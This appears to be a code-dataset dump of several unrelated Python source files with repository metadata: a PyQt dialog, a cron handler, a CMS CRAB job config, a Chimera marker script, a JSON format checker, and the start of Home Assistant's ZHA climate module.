item = self.cpage_twidget.horizontalHeaderItem(2)
item.setText(_translate("CadastrePageReportDialog", "Page Number", None))
item = self.cpage_twidget.horizontalHeaderItem(3)
item.setText(_translate("CadastrePageReportDialog", "Person ID", None))
item = self.cpage_twidget.horizontalHeaderItem(4)
item.setText(_translate("CadastrePageReportDialog", "Right Holder", None))
item = self.cpage_twidget.horizontalHeaderItem(5)
item.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
item = self.cpage_twidget.horizontalHeaderItem(6)
item.setText(_translate("CadastrePageReportDialog", "Streetname-Khashaa", None))
self.print_button.setText(_translate("CadastrePageReportDialog", "Print", None))
self.label_2.setText(_translate("CadastrePageReportDialog", "Cadastre page report", None))
self.print_year_chbox.setText(_translate("CadastrePageReportDialog", "Year Print", None))
self.label_3.setText(_translate("CadastrePageReportDialog", "Person ID", None))
self.label_4.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
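if __name__ == "__main__":
    # Usage sketch for the generated class (standard pyuic pattern; assumes
    # PyQt4 is installed):
    import sys
    app = QtGui.QApplication(sys.argv)
    dialog = QtGui.QDialog()
    ui = Ui_CadastrePageReportDialog()
    ui.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())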
| [
"[email protected]"
] | |
4305a9232a81ce0a924a5bae10cd5e4b6444862a | 171a89102edf10901e18a2c0f41c3313608d2324 | /src/rogerthat/cron/send_unread_reminder.py | 2f76a5ae8ad60c5efdeacb4ee60c30ac0549458b | [
"Apache-2.0"
] | permissive | gitter-badger/rogerthat-backend | 7e9c12cdd236ef59c76a62ac644fcd0a7a712baf | ab92dc9334c24d1b166972b55f1c3a88abe2f00b | refs/heads/master | 2021-01-18T06:08:11.435313 | 2016-05-11T08:50:20 | 2016-05-11T08:50:20 | 58,615,985 | 0 | 0 | null | 2016-05-12T06:54:07 | 2016-05-12T06:54:07 | null | UTF-8 | Python | false | false | 834 | py | # -*- coding: utf-8 -*-
# Copyright 2016 Mobicage NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.1@@
from rogerthat.bizz.job.send_unread_messages import send
from google.appengine.ext import webapp
class UnreadMessageReminderHandler(webapp.RequestHandler):
def get(self):
send(dry_run=False)
| [
"[email protected]"
] | |
25622946d4cc694e63901dc2980ec2fa9f1ae137 | 57c62abd33f8b508e357ca8631a160ce85a7f340 | /ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/crab_FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8.py | 4470aec7aea4019d8df76db06409c83c17dfeaf4 | [] | no_license | jainshilpi/aNTGC_ggNtuplizer | 8973ce3cdab293317fd928679b14038f03c10976 | 7153d73fbee35969dad0d85c6517e577a0546566 | refs/heads/master | 2022-09-18T07:39:40.246699 | 2020-04-20T13:03:20 | 2020-04-20T13:03:20 | 267,979,045 | 1 | 1 | null | 2020-05-30T00:09:36 | 2020-05-30T00:09:36 | null | UTF-8 | Python | false | false | 2,178 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
import sys
config = config()
#**************************submit function***********************
from CRABAPI.RawCommand import crabCommand
from CRABClient.ClientExceptions import ClientException
from httplib import HTTPException
def submit(config):
try:
crabCommand('submit', config = config)
except HTTPException as hte:
print "Failed submitting task: %s" % (hte.headers)
except ClientException as cle:
print "Failed submitting task: %s" % (cle)
#****************************************************************
workarea='/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/'
mainOutputDir = '/store/user/mwadud/aNTGC/ggNtuplizerSkim/xSecs/'
config.General.requestName = 'FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8'
config.General.transferLogs = True
config.General.workArea = '%s' % workarea
config.Site.storageSite = 'T2_US_Wisconsin'
config.Site.whitelist = ['T3_US_UCR','T3_US_FNALLPC','T2_US_Purdue','T3_US_Rice','T3_US_Cornell','T3_US_Rutgers','T3_US_FIU','T3_US_FIT','T3_US_PSC','T3_US_OSU','T3_US_TAMU','T3_US_UMD','T3_US_VC3_NotreDame','T3_US_SDSC','T3_US_Colorado','T3_US_OSG','T3_US_Princeton_ICSE','T3_US_NERSC','T3_US_Baylor','T2_US_Nebraska','T2_US_UCSD','T2_US_Wisconsin','T2_US_MIT','T3_US_TACC','T3_US_TTU','T3_US_UMiss']
config.Site.blacklist = ['T2_US_Florida','T2_US_Vanderbilt','T3_US_PuertoRico','T2_US_Caltech']
config.JobType.psetName = '/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/XsecAna.py'
config.JobType.pluginName = 'Analysis'
config.Data.inputDataset = '/GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.publication = False
config.Data.allowNonValidInputDataset = True
config.Data.outLFNDirBase = '%s' % mainOutputDir
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 5000
config.Data.ignoreLocality = True
config.Data.totalUnits = 5000
submit(config)
| [
"[email protected]"
] | |
1cdc35d465e2d36f6b9dbcee0ccaa1c9a68fe7fd | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_24852.py | 0c27ea11820885c9563e4852cbe27378470e68f3 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except ImportError:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((536.102, 420.6, 619.247), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((531.774, 477.248, 575.871), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((530.591, 547.332, 531.073), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((574.999, 545.265, 662.572), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((514.88, 674.99, 390.318), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((525.726, 456.842, 592.226), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((525.401, 456.177, 592.771), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((497.945, 461.622, 593.485), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((489.47, 488.345, 593.387), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((466.432, 482.69, 608.386), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((441.086, 490.185, 617.892), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((442.367, 466.112, 632.426), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((535.76, 430.229, 594.197), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((346.573, 497.307, 666.033), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((381.477, 607.364, 500.136), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((381.477, 607.364, 500.136), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((405.039, 598.129, 513.244), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((428.199, 586.683, 525.425), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((450.137, 571.143, 535.615), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((468.197, 549.587, 541.645), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((482.793, 524.718, 543.984), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((492.835, 497.45, 546.677), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((294.216, 641.996, 625.095), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((686.947, 337.35, 479.808), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((507.234, 504.53, 513.028), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((507.234, 504.53, 513.028), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((521.843, 515.862, 534.197), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((548.917, 523.011, 539.825), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((554.226, 546.614, 556.007), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((575.468, 458.014, 640.709), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((531.826, 640.077, 475.472), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((550.624, 476.489, 597.036), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((550.813, 476.507, 597.159), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((558.797, 456.987, 578.122), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((536.994, 446.214, 563.08), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((508.395, 447.652, 561.121), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((480.361, 449.521, 566.859), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((456.185, 450.2, 582.433), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((438.957, 447.29, 605.431), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((484.207, 431.772, 535.719), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((394.025, 463.66, 680.011), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((525.627, 443.578, 519.064), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((534.371, 463.471, 533.759), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((554.566, 506.6, 566.828), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((573.12, 552.993, 594.966), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((623.089, 498.477, 625.518), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((562.76, 656.528, 609.552), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((551.659, 430.878, 536.446), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((563.589, 450.866, 520.852), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((585.763, 468.066, 518.671), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((600.138, 482.561, 499.402), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((588.319, 507.991, 497.819), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((576.134, 532.851, 502.381), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((551.519, 472.589, 551.155), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((600.964, 592.874, 453.45), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
f806b32b55a9145c4c04c121ccedc5edfff7e060 | 632d7759536ed0726499c2d52c8eb13b5ab213ab | /Data/Packages/mdpopups/tests/validate_json_format.py | 0afbb2d170664281507ba611c0927e38799d1ae9 | [
"MIT"
] | permissive | Void2403/sublime_text_3_costomize | e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc | c19977e498bd948fd6d8f55bd48c8d82cbc317c3 | refs/heads/master | 2023-08-31T21:32:32.791574 | 2019-05-31T11:46:19 | 2019-05-31T11:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,661 | py | """
Validate JSON format.
Licensed under MIT
Copyright (c) 2012-2015 Isaac Muse <[email protected]>
"""
import re
import codecs
import json
RE_LINE_PRESERVE = re.compile(r"\r?\n", re.MULTILINE)
RE_COMMENT = re.compile(
r'''(?x)
(?P<comments>
/\*[^*]*\*+(?:[^/*][^*]*\*+)*/ # multi-line comments
| [ \t]*//(?:[^\r\n])* # single line comments
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quotes
| .[^/"']* # everything else
)
''',
re.DOTALL
)
RE_TRAILING_COMMA = re.compile(
r'''(?x)
(
(?P<square_comma>
, # trailing comma
(?P<square_ws>[\s\r\n]*) # white space
(?P<square_bracket>\]) # bracket
)
| (?P<curly_comma>
, # trailing comma
(?P<curly_ws>[\s\r\n]*) # white space
(?P<curly_bracket>\}) # bracket
)
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quoted string
| .[^,"']* # everything else
)
''',
re.DOTALL
)
RE_LINE_INDENT_TAB = re.compile(r'^(?:(\t+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_LINE_INDENT_SPACE = re.compile(r'^(?:((?: {4})+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_TRAILING_SPACES = re.compile(r'^.*?[ \t]+\r?\n?$')
RE_COMMENT_END = re.compile(r'\*/')
PATTERN_COMMENT_INDENT_SPACE = r'^(%s *?[^\t\r\n][^\r\n]*)?\r?\n$'
PATTERN_COMMENT_INDENT_TAB = r'^(%s[ \t]*[^ \t\r\n][^\r\n]*)?\r?\n$'
E_MALFORMED = "E0"
E_COMMENTS = "E1"
E_COMMA = "E2"
W_NL_START = "W1"
W_NL_END = "W2"
W_INDENT = "W3"
W_TRAILING_SPACE = "W4"
W_COMMENT_INDENT = "W5"
VIOLATION_MSG = {
E_MALFORMED: 'JSON content is malformed.',
E_COMMENTS: 'Comments are not part of the JSON spec.',
E_COMMA: 'Dangling comma found.',
W_NL_START: 'Unnecessary newlines at the start of file.',
W_NL_END: 'Missing a new line at the end of the file.',
W_INDENT: 'Indentation Error.',
W_TRAILING_SPACE: 'Trailing whitespace.',
W_COMMENT_INDENT: 'Comment Indentation Error.'
}
class CheckJsonFormat(object):
"""
Test JSON for format irregularities.
- Trailing spaces.
- Inconsistent indentation.
- New lines at end of file.
- Unnecessary newlines at start of file.
- Trailing commas.
- Malformed JSON.
"""
def __init__(self, use_tabs=False, allow_comments=False):
"""Setup the settings."""
self.use_tabs = use_tabs
self.allow_comments = allow_comments
self.fail = False
def index_lines(self, text):
"""Index the char range of each line."""
self.line_range = []
count = 1
last = 0
for m in re.finditer('\n', text):
self.line_range.append((last, m.end(0) - 1, count))
last = m.end(0)
count += 1
def get_line(self, pt):
"""Get the line from char index."""
line = None
for r in self.line_range:
if pt >= r[0] and pt <= r[1]:
line = r[2]
break
return line
def check_comments(self, text):
"""
Check for JavaScript comments.
Log them and strip them out so we can continue.
"""
def remove_comments(group):
return ''.join([x[0] for x in RE_LINE_PRESERVE.findall(group)])
def evaluate(m):
text = ''
g = m.groupdict()
if g["code"] is None:
if not self.allow_comments:
self.log_failure(E_COMMENTS, self.get_line(m.start(0)))
text = remove_comments(g["comments"])
else:
text = g["code"]
return text
        content = ''.join(map(evaluate, RE_COMMENT.finditer(text)))
return content
def check_dangling_commas(self, text):
"""
Check for dangling commas.
Log them and strip them out so we can continue.
"""
def check_comma(g, m, line):
# ,] -> ] or ,} -> }
self.log_failure(E_COMMA, line)
if g["square_comma"] is not None:
return g["square_ws"] + g["square_bracket"]
else:
return g["curly_ws"] + g["curly_bracket"]
def evaluate(m):
g = m.groupdict()
return check_comma(g, m, self.get_line(m.start(0))) if g["code"] is None else g["code"]
        return ''.join(map(evaluate, RE_TRAILING_COMMA.finditer(text)))
def log_failure(self, code, line=None):
"""
Log failure.
Log failure code, line number (if available) and message.
"""
if line:
print("%s: Line %d - %s" % (code, line, VIOLATION_MSG[code]))
else:
print("%s: %s" % (code, VIOLATION_MSG[code]))
self.fail = True
def check_format(self, file_name):
"""Initiate the check."""
self.fail = False
comment_align = None
with codecs.open(file_name, encoding='utf-8') as f:
count = 1
for line in f:
indent_match = (RE_LINE_INDENT_TAB if self.use_tabs else RE_LINE_INDENT_SPACE).match(line)
end_comment = (
(comment_align is not None or (indent_match and indent_match.group(2))) and
RE_COMMENT_END.search(line)
)
# Don't allow empty lines at file start.
if count == 1 and line.strip() == '':
self.log_failure(W_NL_START, count)
# Line must end in new line
if not line.endswith('\n'):
self.log_failure(W_NL_END, count)
# Trailing spaces
if RE_TRAILING_SPACES.match(line):
self.log_failure(W_TRAILING_SPACE, count)
# Handle block comment content indentation
if comment_align is not None:
if comment_align.match(line) is None:
self.log_failure(W_COMMENT_INDENT, count)
if end_comment:
comment_align = None
# Handle general indentation
elif indent_match is None:
self.log_failure(W_INDENT, count)
# Enter into block comment
elif comment_align is None and indent_match.group(2):
alignment = indent_match.group(1) if indent_match.group(1) is not None else ""
if not end_comment:
comment_align = re.compile(
(PATTERN_COMMENT_INDENT_TAB if self.use_tabs else PATTERN_COMMENT_INDENT_SPACE) % alignment
)
count += 1
f.seek(0)
text = f.read()
self.index_lines(text)
text = self.check_comments(text)
self.index_lines(text)
text = self.check_dangling_commas(text)
try:
json.loads(text)
except Exception as e:
self.log_failure(E_MALFORMED)
print(e)
return self.fail
if __name__ == "__main__":
import sys
cjf = CheckJsonFormat(False, True)
cjf.check_format(sys.argv[1])
| [
"[email protected]"
] | |
dede3dc0563b1336d20fdf7f164822132c1bf9be | 2ed86a79d0fcd299ad4a01310954c5eddcf01edf | /homeassistant/components/zha/climate.py | 9f999bd52fa561f770e24b9319954d8356a8b231 | [
"Apache-2.0"
] | permissive | konnected-io/home-assistant | 037f12c87bb79e19220192eb918e49db1b1a8b3e | 2e65b77b2b5c17919939481f327963abdfdc53f0 | refs/heads/dev | 2023-05-11T08:57:41.891518 | 2023-05-07T20:03:37 | 2023-05-07T20:03:37 | 109,931,626 | 24 | 10 | Apache-2.0 | 2023-02-22T06:24:01 | 2017-11-08T05:27:21 | Python | UTF-8 | Python | false | false | 29,742 | py | """Climate on Zigbee Home Automation networks.
For more details on this platform, please refer to the documentation
at https://home-assistant.io/components/zha.climate/
"""
from __future__ import annotations
from datetime import datetime, timedelta
import functools
from random import randint
from typing import Any
from zigpy.zcl.clusters.hvac import Fan as F, Thermostat as T
from homeassistant.components.climate import (
ATTR_HVAC_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
FAN_AUTO,
FAN_ON,
PRESET_AWAY,
PRESET_BOOST,
PRESET_COMFORT,
PRESET_ECO,
PRESET_NONE,
ClimateEntity,
ClimateEntityFeature,
HVACAction,
HVACMode,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
Platform,
UnitOfTemperature,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_time_interval
import homeassistant.util.dt as dt_util
from .core import discovery
from .core.const import (
CLUSTER_HANDLER_FAN,
CLUSTER_HANDLER_THERMOSTAT,
DATA_ZHA,
PRESET_COMPLEX,
PRESET_SCHEDULE,
PRESET_TEMP_MANUAL,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
)
from .core.registries import ZHA_ENTITIES
from .entity import ZhaEntity
ATTR_SYS_MODE = "system_mode"
ATTR_RUNNING_MODE = "running_mode"
ATTR_SETPT_CHANGE_SRC = "setpoint_change_source"
ATTR_SETPT_CHANGE_AMT = "setpoint_change_amount"
ATTR_OCCUPANCY = "occupancy"
ATTR_PI_COOLING_DEMAND = "pi_cooling_demand"
ATTR_PI_HEATING_DEMAND = "pi_heating_demand"
ATTR_OCCP_COOL_SETPT = "occupied_cooling_setpoint"
ATTR_OCCP_HEAT_SETPT = "occupied_heating_setpoint"
ATTR_UNOCCP_HEAT_SETPT = "unoccupied_heating_setpoint"
ATTR_UNOCCP_COOL_SETPT = "unoccupied_cooling_setpoint"
STRICT_MATCH = functools.partial(ZHA_ENTITIES.strict_match, Platform.CLIMATE)
MULTI_MATCH = functools.partial(ZHA_ENTITIES.multipass_match, Platform.CLIMATE)
RUNNING_MODE = {0x00: HVACMode.OFF, 0x03: HVACMode.COOL, 0x04: HVACMode.HEAT}
SEQ_OF_OPERATION = {
0x00: [HVACMode.OFF, HVACMode.COOL], # cooling only
0x01: [HVACMode.OFF, HVACMode.COOL], # cooling with reheat
0x02: [HVACMode.OFF, HVACMode.HEAT], # heating only
0x03: [HVACMode.OFF, HVACMode.HEAT], # heating with reheat
# cooling and heating 4-pipes
0x04: [HVACMode.OFF, HVACMode.HEAT_COOL, HVACMode.COOL, HVACMode.HEAT],
# cooling and heating 4-pipes
0x05: [HVACMode.OFF, HVACMode.HEAT_COOL, HVACMode.COOL, HVACMode.HEAT],
0x06: [HVACMode.COOL, HVACMode.HEAT, HVACMode.OFF], # centralite specific
0x07: [HVACMode.HEAT_COOL, HVACMode.OFF], # centralite specific
}
HVAC_MODE_2_SYSTEM = {
HVACMode.OFF: T.SystemMode.Off,
HVACMode.HEAT_COOL: T.SystemMode.Auto,
HVACMode.COOL: T.SystemMode.Cool,
HVACMode.HEAT: T.SystemMode.Heat,
HVACMode.FAN_ONLY: T.SystemMode.Fan_only,
HVACMode.DRY: T.SystemMode.Dry,
}
SYSTEM_MODE_2_HVAC = {
T.SystemMode.Off: HVACMode.OFF,
T.SystemMode.Auto: HVACMode.HEAT_COOL,
T.SystemMode.Cool: HVACMode.COOL,
T.SystemMode.Heat: HVACMode.HEAT,
T.SystemMode.Emergency_Heating: HVACMode.HEAT,
